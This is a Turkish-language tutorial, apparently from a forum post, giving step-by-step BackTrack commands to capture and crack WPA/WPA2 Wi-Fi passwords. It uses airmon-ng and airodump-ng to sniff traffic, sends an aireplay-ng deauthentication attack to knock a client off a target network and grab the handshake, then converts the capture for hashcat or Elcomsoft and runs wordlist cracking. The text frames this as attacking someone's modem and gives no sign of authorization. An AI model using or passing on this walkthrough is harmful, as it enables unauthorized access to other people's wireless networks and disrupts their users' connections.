Wpa/Wpa2 İçin Handshake Yakalama Kırma ve Elcomsoft için uyarlama

gI_lock.jpgBuradaki mantık şudur, modeme bağlı kullanıcıları dinlerken , modeme bağlı kullanıcılardan birini düşürüyoruz. Yeniden bağlanmaya çalışıldığında mevcut şifre modem ile kullanıcı arasında bir defa geliyor ve doğrulanıyor. İşte bu paketi yakalarsak o paket üzerinden şifrelenmiş kablosuz şifreyi buluyoruz.

 

 

 



Başlayalım ;

BackTrack konsol açıp 


root@bt:~# .airmon-ng start wlan0 
[wlan sizde değişik olabilir ,
"ifconfig" yazarak öğrenebilirsiniz ]
root@bt:~# .cd Desktop
Dosyaların masaüstüne kayıt olması için
root@bt:~# .airodump-ng -w kayit mon0

dinleme ve kayıt modundayız artık. hedef modeme saldırarak kullanıcılardan
birini ağdan düşürme vakti. Ağdan düşecek yeniden bağlanacak ve handshake elimizde.

root@bt:~# .aireplay-ng -0 6 -a [Modemin Mac Adresi] -c [Clientin Mac Adresi] mon0

açılan pencerede ;

[ 6|64 ACKs] yazan yer [ 0|00 ACKs] olması durumunda durdurup işlemi tekrarlayınız.

Bu işlem sırasında Ağı düşürdüyseniz Aşağıdaki resimdeki gibi modemin Mac Adresi
yazar artık yakalama işlemi tamamlanmıştır. Elimizde kayit.cap isimli handshakeyi
elde ettik. tabi bunun yanında 3 adet farklı dosyalarda oluştu onlar bizim için
önemli değil.



Handshake için diğer bir yol ise , hedef modemi dinlerken ,farklı bir bilgisayardan
modeme saçma bir şifre ile bağlanmaya çalışmak. Bağlanamıyorsunuz elbette ama modem
ve kullanıcı arasındaki şifre doğrulaması gerçekleştiğinden handshake yakalanmış
oluyor. Böylede handshake yakalayabildim ancak yakalanan handshake ne kadar verimli
bunu test etmedim.

Şimdi Bu Handshakeyi hashcat-GUI ye yada EWSA (Elcomsotf Wireless Security Auditor ) 
ün görebileceği şekilde dönüştürmeye kaldı.
Gördüğümüz gibi 4 adet dosya oluştu

root@bt:~# .aircrack-ng kayit-01.cap -J hashcatdosya
yazarak hashcat için dosyamız oluşur 

yada

root@bt:~# .aircrack-ng kayit-01.cap -E ewsadosya 
yazarsak ta ewsa için dosya oluşacaktır

artık bunları backtrackten windowsa çıkartarak kırabiliriz.

Yada yeni bir konsol açıp ;

root@bt:~# .aircrack-ng kayit-01.cap -w wordlist.txt

yazarak şifreye ulaşabilirsiniz.